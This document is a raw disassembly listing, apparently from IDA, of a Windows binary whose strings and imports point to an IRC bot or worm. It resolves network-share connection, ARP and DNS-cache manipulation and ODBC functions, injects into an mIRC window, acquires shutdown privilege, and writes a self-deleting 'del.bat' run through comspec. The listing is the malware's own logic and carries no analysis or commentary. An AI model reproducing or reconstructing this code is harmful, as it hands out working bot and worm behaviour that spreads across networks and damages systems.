call esi
cmp dword_433488, ebx
mov dword_4334B4, eax
jz short loc_405075
cmp dword_4334A4, ebx
jz short loc_405075
cmp dword_4335A0, ebx
jz short loc_405075
cmp dword_433454, ebx
jz short loc_405075
cmp dword_4334D8, ebx
jz short loc_405075
cmp dword_43341C, ebx
jz short loc_405075
cmp dword_43346C, ebx
jz short loc_405075
cmp dword_433568, ebx
jz short loc_405075
cmp dword_433480, ebx
jz short loc_405075
cmp dword_43348C, ebx
jz short loc_405075
cmp eax, ebx
jnz short loc_40507F
jmp short loc_405075
; ---------------------------------------------------------------------------
loc_40506A: ; CODE XREF: sub_40468E+8F1�j
call ds:dword_41F008
mov dword_43362C, eax
loc_405075: ; CODE XREF: sub_40468E+98C�j
; sub_40468E+994�j ...
mov dword_433628, 1
loc_40507F: ; CODE XREF: sub_40468E+9D8�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_4050B4
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_433584, eax
call esi
cmp dword_433584, ebx
mov dword_433504, eax
jz short loc_4050BF
cmp eax, ebx
jnz short loc_4050C9
jmp short loc_4050BF
; ---------------------------------------------------------------------------
loc_4050B4: ; CODE XREF: sub_40468E+9FC�j
call ds:dword_41F008
mov dword_433634, eax
loc_4050BF: ; CODE XREF: sub_40468E+A1E�j
; sub_40468E+A24�j
mov dword_433630, 1
loc_4050C9: ; CODE XREF: sub_40468E+A22�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_4050FE
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_4334AC, eax
call esi
cmp dword_4334AC, ebx
mov dword_43350C, eax
jz short loc_405109
cmp eax, ebx
jnz short loc_405113
jmp short loc_405109
; ---------------------------------------------------------------------------
loc_4050FE: ; CODE XREF: sub_40468E+A46�j
call ds:dword_41F008
mov dword_43363C, eax
loc_405109: ; CODE XREF: sub_40468E+A68�j
; sub_40468E+A6E�j
mov dword_433638, 1
loc_405113: ; CODE XREF: sub_40468E+A6C�j
push offset aMpr_dll ; "mpr.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_405172
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_433540, eax
call esi
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_4335D0, eax
call esi
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_43347C, eax
call esi
cmp dword_433540, ebx
mov dword_433440, eax
jz short loc_40517D
cmp dword_4335D0, ebx
jz short loc_40517D
cmp dword_43347C, ebx
jz short loc_40517D
cmp eax, ebx
jnz short loc_405187
jmp short loc_40517D
; ---------------------------------------------------------------------------
loc_405172: ; CODE XREF: sub_40468E+A90�j
call ds:dword_41F008
mov dword_433644, eax
loc_40517D: ; CODE XREF: sub_40468E+ACC�j
; sub_40468E+AD4�j ...
mov dword_433640, 1
loc_405187: ; CODE XREF: sub_40468E+AE0�j
push offset aShell32_dll ; "shell32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_4051BC
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_4335A8, eax
call esi
cmp dword_4335A8, ebx
mov dword_433474, eax
jz short loc_4051C7
cmp eax, ebx
jnz short loc_4051D1
jmp short loc_4051C7
; ---------------------------------------------------------------------------
loc_4051BC: ; CODE XREF: sub_40468E+B04�j
call ds:dword_41F008
mov dword_43364C, eax
loc_4051C7: ; CODE XREF: sub_40468E+B26�j
; sub_40468E+B2C�j
mov dword_433648, 1
loc_4051D1: ; CODE XREF: sub_40468E+B2A�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_40525A
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_43358C, eax
call esi
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_43345C, eax
call esi
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_4335A4, eax
call esi
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_4334C4, eax
call esi
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_433550, eax
call esi
cmp dword_43358C, ebx
mov dword_433468, eax
jz short loc_405265
cmp dword_43345C, ebx
jz short loc_405265
cmp dword_4335A4, ebx
jz short loc_405265
cmp dword_4334C4, ebx
jz short loc_405265
cmp dword_433550, ebx
jz short loc_405265
cmp eax, ebx
jnz short loc_40526F
jmp short loc_405265
; ---------------------------------------------------------------------------
loc_40525A: ; CODE XREF: sub_40468E+B4E�j
call ds:dword_41F008
mov dword_433654, eax
loc_405265: ; CODE XREF: sub_40468E+BA4�j
; sub_40468E+BAC�j ...
mov dword_433650, 1
loc_40526F: ; CODE XREF: sub_40468E+BC8�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_40468E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405277 proc near ; CODE XREF: sub_4078FA+424B�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_4335F0, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_4052BF
push dword_4335F4
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4052BF: ; CODE XREF: sub_405277+1A�j
cmp dword_4335F8, esi
jz short loc_4052F3
push dword_4335FC
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4052F3: ; CODE XREF: sub_405277+4E�j
cmp dword_433600, esi
jz short loc_405327
push dword_433604
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_405327: ; CODE XREF: sub_405277+82�j
cmp dword_433608, esi
jz short loc_40535B
push dword_43360C
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40535B: ; CODE XREF: sub_405277+B6�j
cmp dword_433610, esi
jz short loc_40538F
push dword_433614
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40538F: ; CODE XREF: sub_405277+EA�j
cmp dword_433618, esi
jz short loc_4053C3
push dword_43361C
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4053C3: ; CODE XREF: sub_405277+11E�j
cmp dword_433620, esi
jz short loc_4053F7
push dword_433624
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4053F7: ; CODE XREF: sub_405277+152�j
cmp dword_433628, esi
jz short loc_40542B
push dword_43362C
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40542B: ; CODE XREF: sub_405277+186�j
cmp dword_433630, esi
jz short loc_40545F
push dword_433634
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40545F: ; CODE XREF: sub_405277+1BA�j
cmp dword_433638, esi
jz short loc_405493
push dword_43363C
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_405493: ; CODE XREF: sub_405277+1EE�j
cmp dword_433640, esi
jz short loc_4054C7
push dword_433644
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4054C7: ; CODE XREF: sub_405277+222�j
cmp dword_433648, esi
jz short loc_4054FB
push dword_43364C
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4054FB: ; CODE XREF: sub_405277+256�j
cmp dword_433650, esi
jz short loc_40552F
push dword_433654
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40552F: ; CODE XREF: sub_405277+28A�j
lea eax, [ebp+var_200]
push offset aMainDllTestCom ; "[MAIN]: DLL test complete."
push eax
call sub_412BB5
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40555C
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40555C: ; CODE XREF: sub_405277+2CE�j
lea eax, [ebp+var_200]
push eax
call sub_401C33
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_405277 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40556E proc near ; CODE XREF: sub_4078FA+A6A�p
; sub_4078FA+A9D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz loc_405645
mov eax, [ebp+arg_4]
cmp eax, esi
jz loc_405645
cmp [ebp+arg_8], esi
jz loc_405645
cmp byte ptr [eax], 0
jz loc_405645
push ebx
push edi
call sub_41E867
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_405640
push [ebp+arg_4]
push edi
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405639
sub eax, edi
push eax
push edi
push ebx
call sub_412C40
mov eax, ebx
sub eax, edi
add esp, 0Ch
and byte ptr [eax+esi], 0
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
loc_4055DB: ; CODE XREF: sub_40556E+72�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4055DB
sub eax, ecx
push eax
push [ebp+arg_8]
push ebx
call sub_412A80
mov eax, [ebp+arg_4]
add esp, 0Ch
lea ecx, [eax+1]
loc_4055F7: ; CODE XREF: sub_40556E+8E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4055F7
sub eax, ecx
add eax, esi
mov esi, eax
loc_405604: ; CODE XREF: sub_40556E+9B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405604
mov edi, ebx
sub eax, esi
dec edi
loc_405610: ; CODE XREF: sub_40556E+A8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_405610
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ebp+arg_0]
mov edx, esi
mov eax, ebx
sub edx, ebx
loc_40562F: ; CODE XREF: sub_40556E+C9�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40562F
loc_405639: ; CODE XREF: sub_40556E+50�j
push ebx
call sub_412FE4
pop ecx
loc_405640: ; CODE XREF: sub_40556E+3B�j
mov eax, esi
pop ebx
jmp short loc_405647
; ---------------------------------------------------------------------------
loc_405645: ; CODE XREF: sub_40556E+C�j
; sub_40556E+17�j ...
xor eax, eax
loc_405647: ; CODE XREF: sub_40556E+D5�j
pop edi
pop esi
pop ebp
retn
sub_40556E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40564B proc near ; CODE XREF: sub_40751F+C2�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor eax, eax
mov ecx, 1F4h
lea edi, [ebp+var_7D0]
rep stosd
mov ecx, [ebp+arg_0]
mov eax, ecx
lea esi, [eax+1]
loc_40566E: ; CODE XREF: sub_40564B+28�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40566E
sub eax, esi
xor ebx, ebx
mov edi, eax
inc ebx
cmp edi, ebx
jge short loc_405685
or eax, 0FFFFFFFFh
jmp short loc_4056E5
; ---------------------------------------------------------------------------
loc_405685: ; CODE XREF: sub_40564B+33�j
xor edx, edx
test edi, edi
mov [ebp+var_7D0], ecx
jle short loc_4056A5
loc_405691: ; CODE XREF: sub_40564B+58�j
mov al, [edx+ecx]
cmp al, 0Ah
jz short loc_40569C
cmp al, 0Dh
jnz short loc_4056A0
loc_40569C: ; CODE XREF: sub_40564B+4B�j
and byte ptr [edx+ecx], 0
loc_4056A0: ; CODE XREF: sub_40564B+4F�j
inc edx
cmp edx, edi
jl short loc_405691
loc_4056A5: ; CODE XREF: sub_40564B+44�j
xor esi, esi
test edi, edi
jle short loc_4056CF
loc_4056AB: ; CODE XREF: sub_40564B+82�j
cmp byte ptr [esi+ecx], 0
jnz short loc_4056CA
lea edx, [esi+ecx+1]
cmp byte ptr [edx], 0
jz short loc_4056CA
cmp ebx, 1F4h
jge short loc_4056CF
mov [ebp+ebx*4+var_7D0], edx
inc ebx
loc_4056CA: ; CODE XREF: sub_40564B+64�j
; sub_40564B+6D�j
inc esi
cmp esi, edi
jl short loc_4056AB
loc_4056CF: ; CODE XREF: sub_40564B+5E�j
; sub_40564B+75�j
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_4056E3
mov ecx, 1F4h
lea esi, [ebp+var_7D0]
rep movsd
loc_4056E3: ; CODE XREF: sub_40564B+89�j
mov eax, ebx
loc_4056E5: ; CODE XREF: sub_40564B+38�j
pop edi
pop esi
pop ebx
leave
retn
sub_40564B endp
; =============== S U B R O U T I N E =======================================
sub_4056EA proc near ; CODE XREF: sub_405A98+26�p
; sub_405AD5+79�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_413A6E
cmp al, 61h
pop ecx
jl short loc_405705
cmp al, 7Ah
jg short loc_405705
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_405705: ; CODE XREF: sub_4056EA+E�j
; sub_4056EA+12�j
xor eax, eax
retn
sub_4056EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405708 proc near ; CODE XREF: sub_4078FA+2B12�p
; sub_4078FA+3596�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_41F008
push 0
push 100h
mov esi, eax
lea eax, [ebp+var_100]
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_41F07C
lea eax, [ebp+var_100]
loc_405741: ; CODE XREF: sub_405708+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40574D
cmp cl, 9
jnz short loc_405750
loc_40574D: ; CODE XREF: sub_405708+3E�j
inc eax
jmp short loc_405741
; ---------------------------------------------------------------------------
loc_405750: ; CODE XREF: sub_405708+43�j
; sub_405708+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_40576A
mov cl, [eax]
cmp cl, 2Eh
jz short loc_405750
cmp cl, 21h
jl short loc_405750
loc_40576A: ; CODE XREF: sub_405708+54�j
push esi
lea eax, [ebp+var_100]
push eax
push [ebp+arg_0]
mov esi, offset dword_433660
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_412E0D
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_405708 endp
; =============== S U B R O U T I N E =======================================
sub_405792 proc near ; CODE XREF: sub_4078FA+41DF�p
push esi
push 0
call dword_43344C
test eax, eax
jz short loc_4057C9
push 1
call dword_4335CC
mov esi, eax
test esi, esi
jz short loc_4057C9
push edi
push esi
call ds:dword_41F084
push esi
mov edi, eax
call ds:dword_41F080
call dword_433430
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4057C9: ; CODE XREF: sub_405792+B�j
; sub_405792+19�j
xor eax, eax
pop esi
retn
sub_405792 endp
; =============== S U B R O U T I N E =======================================
sub_4057CD proc near ; CODE XREF: sub_4078FA+34F6�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
push esi
mov edi, offset aMirc_0 ; "mIRC"
push edi
call dword_4334F8
mov ebp, eax
cmp ebp, esi
jz short loc_405849
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_41F090
push esi
push esi
push esi
mov edi, eax
push 0F001Fh
push edi
call ds:dword_41F08C
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_412BB5
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_433560
push esi
push 1
push 4C9h
push ebp
call dword_433560
push ebx
call ds:dword_41F088
push edi
call ds:dword_41F034
xor eax, eax
inc eax
pop ebx
jmp short loc_40584B
; ---------------------------------------------------------------------------
loc_405849: ; CODE XREF: sub_4057CD+16�j
xor eax, eax
loc_40584B: ; CODE XREF: sub_4057CD+7A�j
pop edi
pop esi
pop ebp
retn
sub_4057CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40584F proc near ; CODE XREF: sub_40D1EF+21E�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
xor esi, esi
push esi
lea eax, [ebp+var_11C]
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_4334C0
test eax, eax
jz short loc_4058F0
push ebx
push edi
push esi
mov edi, 80h
push edi
push 3
push esi
mov esi, ds:dword_41F03C
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4058EE
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_41F098
push ebx
mov ebx, ds:dword_41F034
call ebx
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4058EE
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_41F094
push esi
call ebx
loc_4058EE: ; CODE XREF: sub_40584F+51�j
; sub_40584F+87�j
pop edi
pop ebx
loc_4058F0: ; CODE XREF: sub_40584F+28�j
pop esi
leave
retn
sub_40584F endp
; =============== S U B R O U T I N E =======================================
sub_4058F3 proc near ; CODE XREF: sub_4078FA+11A9�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_40707D
pop ecx
pop ecx
push 50005h
push 6
call dword_433538
neg eax
sbb eax, eax
neg eax
retn
sub_4058F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405915 proc near ; CODE XREF: sub_401F06+495�p
; sub_4078FA+4492�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push ebx
xor ebx, ebx
cmp dword_42AE58, ebx
push esi
jz short loc_405939
cmp dword_433600, ebx
jnz short loc_405939
push ebx
call sub_401E73
pop ecx
loc_405939: ; CODE XREF: sub_405915+13�j
; sub_405915+1B�j
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_41F0A4
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_412BB5
add esp, 0Ch
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_260]
push eax
call ds:dword_41F03C
mov esi, eax
cmp esi, ebx
jbe loc_405A94
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_412BB5
lea eax, [ebp+var_764]
add esp, 0Ch
lea edx, [eax+1]
loc_4059AC: ; CODE XREF: sub_405915+9C�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4059AC
push edi
push ebx
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
lea eax, [ebp+var_764]
push eax
push esi
call ds:dword_41F038
push esi
call ds:dword_41F034
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
push 11h
stosd
pop ecx
xor eax, eax
lea edi, [ebp+var_58]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_15C]
push eax
push ebx
mov [ebp+var_4C], 41FA76h
mov [ebp+var_58], 44h
mov [ebp+var_2C], 1
mov [ebp+var_28], bx
call ds:dword_41F078
push eax
call ds:dword_41F010
lea eax, [ebp+var_15C]
push eax
call ds:dword_41F06C
cmp eax, 0FFFFFFFFh
pop edi
jz short loc_405A3D
push 80h
lea eax, [ebp+var_15C]
push eax
call ds:dword_41F0A0
loc_405A3D: ; CODE XREF: sub_405915+114�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_412BB5
add esp, 10h
push esi
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_41F09C
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push ebx
push ebx
push 4010h
push ebx
push ebx
push ebx
lea eax, [ebp+var_364]
push eax
push ebx
call ds:dword_41F030
loc_405A94: ; CODE XREF: sub_405915+6D�j
pop esi
pop ebx
leave
retn
sub_405915 endp
; =============== S U B R O U T I N E =======================================
sub_405A98 proc near ; CODE XREF: sub_405AD5+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
rep stosd
lea edi, [eax-1]
xor esi, esi
test edi, edi
jl short loc_405AD2
push ebx
mov ebx, edi
loc_405AB5: ; CODE XREF: sub_405A98+37�j
mov eax, [esp+0Ch+arg_0]
movsx eax, byte ptr [esi+eax]
push eax
call sub_4056EA
pop ecx
mov ecx, [esp+0Ch+arg_8]
inc esi
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_405AB5
pop ebx
loc_405AD2: ; CODE XREF: sub_405A98+18�j
pop edi
pop esi
retn
sub_405A98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405AD5 proc near ; CODE XREF: sub_401D13+10�p
; sub_401D45+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_412DD0
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_405AE8: ; CODE XREF: sub_405AD5+18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405AE8
sub eax, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_405AFA: ; CODE XREF: sub_405AD5+2A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405AFA
push ebx
push esi
sub eax, ecx
mov esi, eax
push edi
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_405A98
add esp, 0Ch
dec esi
mov edi, esi
jmp short loc_405B97
; ---------------------------------------------------------------------------
loc_405B23: ; CODE XREF: sub_405AD5+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_413A6E
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_413A6E
cmp eax, ebx
pop ecx
pop ecx
jz short loc_405B95
loc_405B45: ; CODE XREF: sub_405AD5+BE�j
mov ebx, [ebp+arg_0]
xor eax, eax
mov al, [edi+ebx]
push eax
call sub_4056EA
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_405B68
mov eax, ecx
loc_405B68: ; CODE XREF: sub_405AD5+8F�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_405BA5
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_413A6E
movsx ecx, byte ptr [edi+ebx]
push ecx
mov [ebp+var_8], eax
call sub_413A6E
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_405B45
loc_405B95: ; CODE XREF: sub_405AD5+6E�j
dec edi
dec esi
loc_405B97: ; CODE XREF: sub_405AD5+4C�j
test esi, esi
jg short loc_405B23
mov eax, [ebp+arg_0]
add eax, edi
loc_405BA0: ; CODE XREF: sub_405AD5+D2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_405BA5: ; CODE XREF: sub_405AD5+98�j
xor eax, eax
jmp short loc_405BA0
sub_405AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405BA9 proc near ; CODE XREF: sub_40668A+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push ebx
push ebx
call dword_43355C
mov edi, eax
cmp edi, ebx
jnz short loc_405BD0
call ds:dword_41F008
mov ebx, eax
jmp short loc_405C45
; ---------------------------------------------------------------------------
loc_405BD0: ; CODE XREF: sub_405BA9+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_4335D8
mov esi, eax
cmp esi, ebx
jnz short loc_405BF0
call ds:dword_41F008
mov ebx, eax
jmp short loc_405C3D
; ---------------------------------------------------------------------------
loc_405BF0: ; CODE XREF: sub_405BA9+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_405C23
cmp eax, 3
jz short loc_405C14
jle short loc_405C36
cmp eax, 6
jg short loc_405C36
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_433580
jmp short loc_405C2A
; ---------------------------------------------------------------------------
loc_405C14: ; CODE XREF: sub_405BA9+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_433564
jmp short loc_405C2A
; ---------------------------------------------------------------------------
loc_405C23: ; CODE XREF: sub_405BA9+4D�j
push esi
call dword_433494
loc_405C2A: ; CODE XREF: sub_405BA9+69�j
; sub_405BA9+78�j
test eax, eax
jnz short loc_405C36
call ds:dword_41F008
mov ebx, eax
loc_405C36: ; CODE XREF: sub_405BA9+54�j
; sub_405BA9+59�j ...
push esi
call dword_4334D0
loc_405C3D: ; CODE XREF: sub_405BA9+45�j
push edi
call dword_4334D0
pop esi
loc_405C45: ; CODE XREF: sub_405BA9+25�j
pop edi
mov eax, ebx
pop ebx
leave
retn
sub_405BA9 endp
; =============== S U B R O U T I N E =======================================
sub_405C4B proc near ; CODE XREF: sub_40668A:loc_4066D2�p
mov ecx, 420h
cmp eax, ecx
ja loc_405CFC
jz loc_405CF5
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_405CBF
jz short loc_405CB5
mov ecx, eax
sub ecx, 3
jz short loc_405CAB
dec ecx
dec ecx
jz short loc_405CA1
dec ecx
jz short loc_405C97
sub ecx, 51h
jz short loc_405C8D
sub ecx, 24h
jnz loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
